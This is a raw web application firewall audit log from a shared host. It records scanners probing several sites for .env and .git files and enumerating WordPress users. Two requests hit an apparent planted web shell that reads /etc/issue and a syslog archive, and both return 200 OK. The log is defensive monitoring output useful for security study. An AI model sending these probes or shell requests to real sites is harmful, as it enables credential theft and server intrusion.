Content-Type: text/html; charset=UTF-8 --5f189577-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.git/refs/heads/master"] [unique_id "aE4C-bhvrRrlmSOg3-93HAAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943033522118 888951 (- - -) Stopwatch2: 1749943033522118 888951; combined=1617, p1=328, p2=1204, p3=0, p4=0, p5=85, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5f189577-Z-- --e2812d09-A-- [15/Jun/2025:04:47:14.450969 +0530] aE4C-cH4SeX80EzN5eWOFwAAAAs 185.177.72.2 39892 127.0.0.1 7081 --e2812d09-B-- GET /admin/.env HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --e2812d09-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --e2812d09-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/admin/.env"] [unique_id "aE4C-cH4SeX80EzN5eWOFwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943033738718 712313 (- - -) Stopwatch2: 1749943033738718 712313; combined=1668, p1=341, p2=1232, p3=0, p4=0, p5=94, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e2812d09-Z-- --9174351c-A-- [15/Jun/2025:04:47:14.551120 +0530] aE4C-dHW4Y-PLzcCvPkPFAAAAAM 185.177.72.2 39906 127.0.0.1 7081 --9174351c-B-- GET /.env.local HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --9174351c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --9174351c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.env.local"] [unique_id "aE4C-dHW4Y-PLzcCvPkPFAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943033829585 721610 (- - -) Stopwatch2: 1749943033829585 721610; combined=2365, p1=597, p2=1686, p3=0, p4=0, p5=82, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9174351c-Z-- --acce2d33-A-- [15/Jun/2025:04:47:14.555204 +0530] aE4C-bdgU2RqPO-R9-XM8wAAAA0 185.177.72.2 39926 127.0.0.1 7081 --acce2d33-B-- GET /settings/.env HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --acce2d33-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --acce2d33-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/settings/.env"] [unique_id "aE4C-bdgU2RqPO-R9-XM8wAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943033915209 640067 (- - -) Stopwatch2: 1749943033915209 640067; combined=1592, p1=321, p2=1180, p3=0, p4=0, p5=90, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --acce2d33-Z-- --62698d61-A-- [15/Jun/2025:04:47:14.561562 +0530] aE4C-Z4hb3-ZG-auIyDYrwAAAAg 185.177.72.2 39920 127.0.0.1 7081 --62698d61-B-- GET /backup/.env HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --62698d61-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --62698d61-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/backup/.env"] [unique_id "aE4C-Z4hb3-ZG-auIyDYrwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943033880285 681333 (- - -) Stopwatch2: 1749943033880285 681333; combined=2240, p1=429, p2=1746, p3=0, p4=0, p5=64, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --62698d61-Z-- --910ae729-A-- [15/Jun/2025:04:47:14.578283 +0530] aE4C-Y-PHe08tXRwhpDusgAAAAQ 185.177.72.2 39954 127.0.0.1 7081 --910ae729-B-- GET /.env HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --910ae729-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --910ae729-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.env"] [unique_id "aE4C-Y-PHe08tXRwhpDusgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943033984388 593956 (- - -) Stopwatch2: 1749943033984388 593956; combined=1444, p1=334, p2=1020, p3=0, p4=0, p5=90, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --910ae729-Z-- --0688ed1e-A-- [15/Jun/2025:04:47:15.001538 +0530] aE4C-tC7wXmuvKRT4TopvwAAAA8 185.177.72.2 39986 127.0.0.1 7081 --0688ed1e-B-- GET /.git/config HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --0688ed1e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --0688ed1e-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.git/config"] [unique_id "aE4C-tC7wXmuvKRT4TopvwAAAA8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943034005142 996481 (- - -) Stopwatch2: 1749943034005142 996481; combined=1585, p1=318, p2=1168, p3=0, p4=0, p5=98, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0688ed1e-Z-- --07525925-A-- [15/Jun/2025:04:47:15.105434 +0530] aE4C-rhvrRrlmSOg3-93HQAAAAw 185.177.72.2 40010 127.0.0.1 7081 --07525925-B-- GET /api/.env HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --07525925-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --07525925-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/api/.env"] [unique_id "aE4C-rhvrRrlmSOg3-93HQAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943034412472 693062 (- - -) Stopwatch2: 1749943034412472 693062; combined=1615, p1=325, p2=1148, p3=0, p4=0, p5=142, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --07525925-Z-- --4af31d4f-A-- [15/Jun/2025:04:47:15.169047 +0530] aE4C-sH4SeX80EzN5eWOGAAAAAs 185.177.72.2 40024 127.0.0.1 7081 --4af31d4f-B-- GET /.git/info/exclude HTTP/1.0 Host: www.tryons.ai X-Real-IP: 185.177.72.2 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Python/3.10 aiohttp/3.12.13 --4af31d4f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --4af31d4f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tryons.ai"] [uri "/.git/info/exclude"] [unique_id "aE4C-sH4SeX80EzN5eWOGAAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749943034452629 716524 (- - -) Stopwatch2: 1749943034452629 716524; combined=1998, p1=347, p2=1523, p3=0, p4=0, p5=127, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4af31d4f-Z-- --c250cd33-A-- [15/Jun/2025:04:49:31.851582 +0530] aE4Dg_BViRrxRfhQ2snbYwAAAAE 98.82.59.253 34188 127.0.0.1 7081 --c250cd33-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc&viewfile=//etc/issue HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.82.59.253 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c250cd33-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --c250cd33-H-- Message: Warning. Matched phrase "etc/issue" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/issue found within ARGS:viewfile: /etc/issue"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/issue" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/issue found within ARGS:viewfile: /etc/issue"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE4Dg_BViRrxRfhQ2snbYwAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749943171846457 5189 (- - -) Stopwatch2: 1749943171846457 5189; combined=2924, p1=364, p2=2412, p3=45, p4=34, p5=69, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c250cd33-Z-- --9ec2703d-A-- [15/Jun/2025:04:50:29.600300 +0530] aE4DvXAK-xWqAl1k3Dz-lAAAAAY 134.122.15.141 38308 127.0.0.1 7080 --9ec2703d-B-- GET /.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 134.122.15.141 Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --9ec2703d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ec2703d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/config"] [unique_id "aE4DvXAK-xWqAl1k3Dz-lAAAAAY"] Stopwatch: 1749943229597248 3112 (- - -) Stopwatch2: 1749943229597248 3112; combined=1948, p1=409, p2=1439, p3=21, p4=27, p5=52, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9ec2703d-Z-- --c0ac4e74-A-- [15/Jun/2025:04:50:29.680231 +0530] aE4DvbdgU2RqPO-R9-XNJwAAAA0 134.122.15.141 38322 127.0.0.1 7080 --c0ac4e74-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 134.122.15.141 Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --c0ac4e74-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0ac4e74-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aE4DvbdgU2RqPO-R9-XNJwAAAA0"] Stopwatch: 1749943229676821 3458 (- - -) Stopwatch2: 1749943229676821 3458; combined=2140, p1=532, p2=1416, p3=30, p4=31, p5=131, sr=160, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c0ac4e74-Z-- --fba64c05-A-- [15/Jun/2025:05:08:03.663633 +0530] aE4H2hkoa9Lad8nP7KN-TwAAABA 91.122.53.173 40796 127.0.0.1 7081 --fba64c05-B-- GET /.git/HEAD HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 91.122.53.173 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: identity User-Agent: Python-urllib/3.13 --fba64c05-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --fba64c05-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/.git/HEAD"] [unique_id "aE4H2hkoa9Lad8nP7KN-TwAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749944282202845 1460858 (- - -) Stopwatch2: 1749944282202845 1460858; combined=2163, p1=420, p2=1643, p3=0, p4=0, p5=99, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fba64c05-Z-- --82ba0e49-A-- [15/Jun/2025:05:13:51.757143 +0530] aE4JNx6N9C2vdY7GQBUrAwAAAAY 54.167.32.123 42118 127.0.0.1 7081 --82ba0e49-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=/var/log&viewfile=/var/log/syslog.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.167.32.123 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --82ba0e49-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2946 Connection: close Content-Type: text/html; charset=UTF-8 --82ba0e49-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /var/log/syslog.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE4JNx6N9C2vdY7GQBUrAwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1749944631752071 5159 (- - -) Stopwatch2: 1749944631752071 5159; combined=2886, p1=468, p2=2250, p3=50, p4=46, p5=72, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --82ba0e49-Z-- --ffb7d313-A-- [15/Jun/2025:05:15:13.182203 +0530] aE4JicH4SeX80EzN5eWQUQAAAAs 213.209.143.71 40100 127.0.0.1 7080 --ffb7d313-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 213.209.143.71 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.1.4418.75 Safari/537.36 Edg/88.0.2359.74 --ffb7d313-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffb7d313-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aE4JicH4SeX80EzN5eWQUQAAAAs"] Stopwatch: 1749944713179416 2836 (- - -) Stopwatch2: 1749944713179416 2836; combined=1574, p1=358, p2=1108, p3=23, p4=21, p5=64, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ffb7d313-Z-- --bea67c4a-A-- [15/Jun/2025:05:17:40.140906 +0530] aE4KG7dgU2RqPO-R9-XPZQAAAA0 173.239.224.41 54208 127.0.0.1 7081 --bea67c4a-B-- GET /.env HTTP/1.0 Host: www.rsda.in X-Real-IP: 173.239.224.41 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --bea67c4a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --bea67c4a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.rsda.in"] [uri "/.env"] [unique_id "aE4KG7dgU2RqPO-R9-XPZQAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749944859780614 360356 (- - -) Stopwatch2: 1749944859780614 360356; combined=1682, p1=373, p2=1215, p3=0, p4=0, p5=93, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bea67c4a-Z-- --205e6647-A-- [15/Jun/2025:05:22:25.620167 +0530] aE4LOMH4SeX80EzN5eWQ6AAAAAs 167.250.235.41 56160 127.0.0.1 7081 --205e6647-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 